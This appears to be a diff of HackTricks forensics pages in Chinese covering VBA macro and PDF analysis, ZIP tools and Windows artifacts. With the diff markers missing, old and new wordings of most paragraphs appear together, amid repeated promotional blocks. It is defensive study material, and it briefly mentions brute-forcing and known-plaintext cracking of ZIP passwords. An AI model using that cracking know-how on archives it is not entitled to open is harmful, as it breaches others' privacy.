有时挑战不在于找到隐藏的静态数据而是分析VBA宏以确定其行为。这是一个更现实的场景也是领域中的分析人员每天都要执行的任务。前面提到的分析工具可以指示是否存在宏并可能为您提取它。在Windows上Office文档中的典型VBA宏将下载一个PowerShell脚本到%TEMP%并尝试执行它这样您现在就有了一个PowerShell脚本分析任务。但是恶意的VBA宏很少复杂因为VBA通常只用作启动代码执行的平台。如果您确实需要理解一个复杂的VBA宏或者宏被混淆并具有解包例程您不需要拥有Microsoft Office的许可证来调试它。您可以使用[Libre Office](http://libreoffice.org)[其界面](http://www.debugpoint.com/2014/09/debugging-libreoffice-macro-basic-using-breakpoint-and-watch/)对于任何调试过程序的人来说都是熟悉的;您可以设置断点、创建监视变量并在解包后但执行任何有效负载行为之前捕获值。您甚至可以从命令行启动特定文档的宏。
有时挑战不在于找到隐藏的静态数据,而在于**分析VBA宏**以确定其行为。这是一个更现实的场景也是领域分析师每天都在执行的任务。上述分析工具可以指示是否存在宏并且可能为您提取它。在Windows上的Office文档中典型的VBA宏将下载一个PowerShell脚本到%TEMP%并尝试执行它在这种情况下您现在也有了PowerShell脚本分析任务。但是恶意VBA宏很少复杂因为VBA[通常只是用作引导代码执行的跳板](https://www.lastline.com/labsblog/party-like-its-1999-comeback-of-vba-malware-downloaders-part-3/)。在您确实需要理解复杂的VBA宏的情况下或者如果宏被混淆并且有一个解包程序您不需要拥有Microsoft Office的许可证来调试这个。您可以使用[Libre Office](http://libreoffice.org)[其界面](http://www.debugpoint.com/2014/09/debugging-libreoffice-macro-basic-using-breakpoint-and-watch/)对任何调试过程序的人来说都会很熟悉;您可以设置断点和创建观察变量,并在解包后但在任何有效载荷行为执行之前捕获值。您甚至可以从命令行启动特定文档的宏:
```
$ soffice path/to/test.docx macro://./standard.module1.mymacro
```
## [oletools](https://github.com/decalage2/oletools)
oletools是一组用于分析和检测Microsoft Office文件中的恶意宏和OLE对象的工具。它包含了一些有用的脚本和工具可以帮助分析人员识别和分析潜在的恶意文件。
### olevba
olevba是oletools中的一个脚本用于分析Office文件中的VBA宏代码。它可以提取和分析VBA宏代码检测潜在的恶意行为并生成报告。
使用olevba您可以
- 提取Office文件中的VBA宏代码
- 分析VBA宏代码查找潜在的恶意行为
- 生成报告包含有关VBA宏代码的详细信息和潜在的恶意行为
### oledump
oledump是oletools中的另一个脚本用于分析Office文件中的OLE对象。它可以提取和分析OLE对象检测潜在的恶意行为并生成报告。
使用oledump您可以
- 提取Office文件中的OLE对象
- 分析OLE对象查找潜在的恶意行为
- 生成报告包含有关OLE对象的详细信息和潜在的恶意行为
### oledir
oledir是oletools中的第三个脚本用于分析Office文件中的目录结构。它可以提取和分析目录结构查找潜在的恶意行为并生成报告。
使用oledir您可以
- 提取Office文件中的目录结构
- 分析目录结构,查找潜在的恶意行为
- 生成报告,包含有关目录结构的详细信息和潜在的恶意行为
### olemeta
olemeta是oletools中的最后一个脚本用于提取和分析Office文件的元数据。它可以提取文件的元数据并生成报告。
使用olemeta您可以
- 提取Office文件的元数据
- 分析元数据,获取有关文件的详细信息
- 生成报告,包含有关文件的元数据和详细信息
oletools是一个强大的工具集可以帮助您分析和检测Microsoft Office文件中的恶意宏和OLE对象。通过使用这些工具您可以更好地了解文件的内容并识别潜在的恶意行为。
```bash
sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
## 自动执行
`AutoOpen`、`AutoExec`或`Document_Open`等宏函数将被**自动执行**
宏功能如 `AutoOpen`、`AutoExec` 或 `Document_Open` 将会被**自动** **执行**
## 参考资料
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,使用全球**最先进的**社区工具。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 可以轻松构建并**自动化工作流程**,这些工作流程由世界上**最先进**的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>从零开始学习AWS hacking</strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
其他支持HackTricks的方式
* 如果您希望在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的hacking技巧。
</details>

48
forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
View file

@ -2,52 +2,56 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客技术通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向[**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,使用全球**最先进的**社区工具。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 来轻松构建并**自动化工作流程**,由世界上**最先进的**社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
来源:[https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
PDF是一种极其复杂的文档文件格式有足够多的技巧和隐藏位置[可以写上几年](https://www.sultanik.com/pocorgtfo/)。这也使得它在CTF取证挑战中很受欢迎。NSA在2008年撰写了一份名为《Adobe PDF文件中的隐藏数据和元数据发布风险和对策》的指南。它在原始URL上已不再可用但你可以[在这里找到一份副本](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf)。Ange Albertini还在GitHub上维护了一个关于[PDF文件格式技巧](https://github.com/corkami/docs/blob/master/PDF/PDF.md)的维基
PDF是一种极其复杂的文档文件格式有足够多的技巧和隐藏地方[可以写上好几年](https://www.sultanik.com/pocorgtfo/)。这也使得它在CTF取证挑战中非常受欢迎。NSA在2008年写了一份关于这些隐藏地方的指南标题为“Adobe PDF文件中的隐藏数据和元数据发布风险和对策”。它在原始URL上不再可用但您可以[在这里找到副本](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf)。Ange Albertini还在GitHub上维护了一个关于[PDF文件格式技巧](https://github.com/corkami/docs/blob/master/PDF/PDF.md)的wiki
PDF格式部分是纯文本类似于HTML但内容中包含许多二进制的“对象”。Didier Stevens撰写了关于该格式的[良好入门材料](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/)。这些二进制对象可以是压缩或加密的数据并包括使用JavaScript或Flash等脚本语言的内容。要显示PDF的结构可以使用文本编辑器浏览它或者使用支持PDF文件格式的编辑器如Origami打开它。
PDF格式部分是纯文本类似HTML但内容中有许多二进制“对象”。Didier Stevens编写了关于格式的[良好入门材料](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/)。二进制对象可以是压缩的或甚至是加密的数据并包括像JavaScript或Flash这样的脚本语言内容。要显示PDF的结构您可以使用文本编辑器浏览它或者用像Origami这样的PDF感知文件格式编辑器打开它。
[qpdf](https://github.com/qpdf/qpdf)是一种有用的工具可以用于探索PDF并从中转换或提取信息。另一个是Ruby框架Origami它可以用于处理PDF文件
[qpdf](https://github.com/qpdf/qpdf) 是一个用于探索PDF并转换或提取信息的有用工具。另一个是Ruby中的框架称为 [Origami](https://github.com/mobmewireless/origami-pdf)
在探索PDF内容中的隐藏数据时,一些要检查的隐藏位置包括:
在探索PDF内容以寻找隐藏数据时,一些要检查的隐藏地方包括:
* 非可见图层
* 不可见的图层
* Adobe的元数据格式“XMP”
* PDF的“增量生成”功能其中保留了先前版本,但对用户不可见
* PDF的“增量生成”功能其中保留了以前的版本,但对用户不可见
* 白色背景上的白色文本
* 图像后面的文本
* 重叠图像后面的图像
* 显示的注释
* 显示的注释
还有几个用于处理PDF文件格式的Python包如[PeepDF](https://github.com/jesparza/peepdf),可以让你编写自己的解析脚本。
还有几个Python包用于处理PDF文件格式如 [PeepDF](https://github.com/jesparza/peepdf),使您能够编写自己的解析脚本。
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客技术通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向[**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
</details>

50
forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
View file

@ -1,29 +1,45 @@
# ZIP技巧
# ZIPs 技巧
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习 AWS 黑客技术直至成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
其他支持 HackTricks 的方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF 版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFTs 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>
有一些命令行工具可用于处理zip文件这些工具非常有用
有一些命令行工具对于 zip 文件非常有用,值得了解
* `unzip`通常会输出有关为何无法解压缩zip文件的有用信息。
* `zipdetails -v`提供了有关格式中各个字段中存在的值的详细信息。
* `zipinfo`列出了zip文件内容的信息无需提取它。
* `zip -F input.zip --out output.zip`和`zip -FF input.zip --out output.zip`尝试修复损坏的zip文件。
* [fcrackzip](https://github.com/hyc/fcrackzip)可以暴力破解zip密码对于密码长度小于7个字符左右的密码)。
* `unzip` 常常会输出有助于了解为什么 zip 文件无法解压的信息。
* `zipdetails -v` 将提供关于格式各个字段中存在的值的深入信息。
* `zipinfo` 列出 zip 文件内容的信息,无需提取它。
* `zip -F input.zip --out output.zip` `zip -FF input.zip --out output.zip` 尝试修复损坏的 zip 文件。
* [fcrackzip](https://github.com/hyc/fcrackzip) 用暴力破解法猜测 zip 密码对于少于7个字符的密码)。
[Zip文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)
[Zip 文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)
关于密码保护的zip文件的一个重要安全注意事项是它们不会加密所包含的压缩文件的文件名和原始文件大小而与密码保护的RAR或7z文件不同
关于密码保护的 zip 文件的一个重要安全相关说明是,它们不会加密文件名和压缩文件的原始文件大小,不像密码保护的 RAR 或 7z 文件
关于zip破解的另一个注意事项是如果你拥有加密zip中任何一个被压缩的文件的未加密/未压缩副本你可以进行“明文攻击”并破解zip文件详细信息请参见[这里](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files),并在[这篇论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)中有解释。使用AES-256而不是“ZipCrypto”对zip文件进行密码保护的较新方案不具有此弱点。
关于破解 zip 的另一个说明是,如果您有加密 zip 中压缩的任何一个文件的未加密/未压缩副本,您可以执行“明文攻击”并破解 zip如[此处详述](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files),并在[这篇论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)中解释。用于密码保护 zip 文件的较新方案(使用 AES-256而不是“ZipCrypto”没有这个弱点。
来源:[https://app.gitbook.com/@cpol/s/hacktricks/\~/edit/drafts/-LlM5mCby8ex5pOeV4pJ/forensics/basic-forensics-esp/zips-tricks](https://app.gitbook.com/o/Iwnw24TnSs9D9I2OtTKX/s/-L\_2uGJGU7AVNRcqRvEi/)
来自:[https://app.gitbook.com/@cpol/s/hacktricks/\~/edit/drafts/-LlM5mCby8ex5pOeV4pJ/forensics/basic-forensics-esp/zips-tricks](https://app.gitbook.com/o/Iwnw24TnSs9D9I2OtTKX/s/-L\_2uGJGU7AVNRcqRvEi/)
<details>
<summary><strong>从零开始学习 AWS 黑客技术直至成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
其他支持 HackTricks 的方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 HackTricks 的 PDF 版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFTs 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>

146
forensics/basic-forensic-methodology/windows-forensics/README.md
View file

@ -4,67 +4,69 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习 AWS 黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 如果你在一家**网络安全公司**工作?你想在**HackTricks**看到你的**公司广告**吗?或者你想要访问**PEASS的最新版本或下载HackTricks的PDF**?查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列。
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)。
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持 HackTricks 的其他方式:
* 如果您想在 **HackTricks 中看到您的公司广告****下载 HackTricks 的 PDF**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的 [**NFTs 集合**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 上 **关注** 我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>
## 通用Windows痕迹
## 通用 Windows 痕迹
### Windows 10 通知
在路径`\Users\<username>\AppData\Local\Microsoft\Windows\Notifications`中,你可以找到数据库`appdb.dat`Windows周年纪念版之前或`wpndatabase.db`Windows周年纪念版之后)。
在路径 `\Users\<username>\AppData\Local\Microsoft\Windows\Notifications` 中,您可以找到数据库 `appdb.dat`Windows 周年纪念版之前)或 `wpndatabase.db`Windows 周年纪念版之后)。
在这个SQLite数据库内部你可以找到`Notification`表其中包含所有通知以XML格式可能包含有趣的数据。
在这个 SQLite 数据库中,您可以找到 `Notification` 表,其中包含所有通知(以 XML 格式),这些通知可能包含有趣的数据。
### 时间线
时间线是Windows的一个特性提供了访问过的网页、编辑过的文档和执行过的应用程序的**按时间顺序的历史记录**。
时间线是 Windows 的一个特性,提供了访问过的网页、编辑过的文档和执行过的应用程序的**按时间顺序的历史记录**。
数据库位于路径`\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`。这个数据库可以用SQLite工具打开或者使用工具[**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **生成两个可以用工具** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **打开的文件**
数据库位于路径 `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`。这个数据库可以用 SQLite 工具打开,或者使用工具 [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **生成两个可以用工具** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **打开的文件**
### ADS(备用数据流)
### ADS (Alternate Data Streams)
下载的文件可能包含**ADS Zone.Identifier**,指示文件是如何从内网、互联网等下载的。一些软件(如浏览器)通常会放入**更多**的**信息**,如下载文件的**URL**。
下载的文件可能包含 **ADS Zone.Identifier**,指示文件是如何从内网、互联网等下载的。一些软件(如浏览器)通常会放入**更多**的**信息**,如下载文件的**URL**。
## **文件备份**
### 回收站
在Vista/Win7/Win8/Win10中**回收站**可以在驱动器根目录的文件夹**`$Recycle.bin`**中找到(`C:\$Recycle.bin`)。\
当文件在这个文件夹中被删除时会创建2个特定的文件:
Vista/Win7/Win8/Win10 中,**回收站**可以在驱动器根目录的文件夹 **`$Recycle.bin`** 中找到(`C:\$Recycle.bin`)。\
当文件在此文件夹中被删除时,会创建两个特定的文件:
* `$I{id}`:文件信息(删除日期)
* `$R{id}`:文件内容
![](<../../../.gitbook/assets/image (486).png>)
拥有这些文件,你可以使用工具[**Rifiuti**](https://github.com/abelcheung/rifiuti2)来获取被删除文件的原始地址和删除日期对于Vista Win10使用`rifiuti-vista.exe`)。
拥有这些文件,您可以使用工具 [**Rifiuti**](https://github.com/abelcheung/rifiuti2) 来获取被删除文件的原始地址和删除日期(对于 Vista Win10 使用 `rifiuti-vista.exe`)。
```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
### 卷影副本
卷影副本是微软Windows中包含的一项技术它可以创建计算机文件或卷的**备份副本**或快照,即使它们正在使用中。
卷影副本是Microsoft Windows中包含的一项技术它可以创建计算机文件或卷的**备份副本**或快照,即使它们正在使用中。
这些备份通常位于文件系统根目录下的`\System Volume Information`中,名称由以下图中显示的**UIDs**组成:
这些备份通常位于文件系统根目录下的`\System Volume Information`中,名称由以下图中显示的**UIDs**组成:
![](<../../../.gitbook/assets/image (520).png>)
使用**ArsenalImageMounter**挂载取证像后,可以使用工具[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html)来检查卷影副本,甚至**提取**来自卷影副本备份的文件。
使用**ArsenalImageMounter**挂载取证像后,可以使用工具[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html)来检查卷影副本,甚至**提取**来自卷影副本备份的文件。
![](<../../../.gitbook/assets/image (521).png>)
注册表项`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore`包含**不备份**的文件和键:
注册表项`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore`包含**不备份**的文件和键:
![](<../../../.gitbook/assets/image (522).png>)
注册表`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS`包含有关`卷影副本`的配置信息。
注册表`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS`包含有关`卷影副本`的配置信息。
### Office自动保存文件
@ -76,16 +78,16 @@ Shell项目是包含如何访问另一个文件的信息的项目。
### 最近文档LNK
Windows在用户**打开、使用或创建文件**时**自动创建**这些**快捷方式**
Windows在用户**打开、使用或创建文件**时**自动**创建这些**快捷方式**
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
当创建一个文件夹时,也会创建到该文件夹、父文件夹和祖父文件夹的链接。
这些自动创建的链接文件**包含有关来源的信息**,比如它是一个**文件**还是一个**文件夹**,该文件的**MAC时间**,存储文件的**卷信息**和**目标文件的文件夹**。这些信息在需要恢复这些文件时可能很有用。
这些自动创建的链接文件**包含有关来源的信息**,比如它是**文件**还是**文件夹**,该文件的**MAC** **时间**,存储文件的**卷信息**和**目标文件的文件夹**。这些信息对于恢复那些被删除的文件很有用。
此外,链接文件的**创建日期**是原始文件**第一次使用**的时间,链接文件的**修改日期**是原始文件最后一次被使用的时间。
此外,链接文件的**创建日期**是原始文件**第一次**被**使用**的时间,链接文件的**修改日期**是原始文件最后一次被使用的时间。
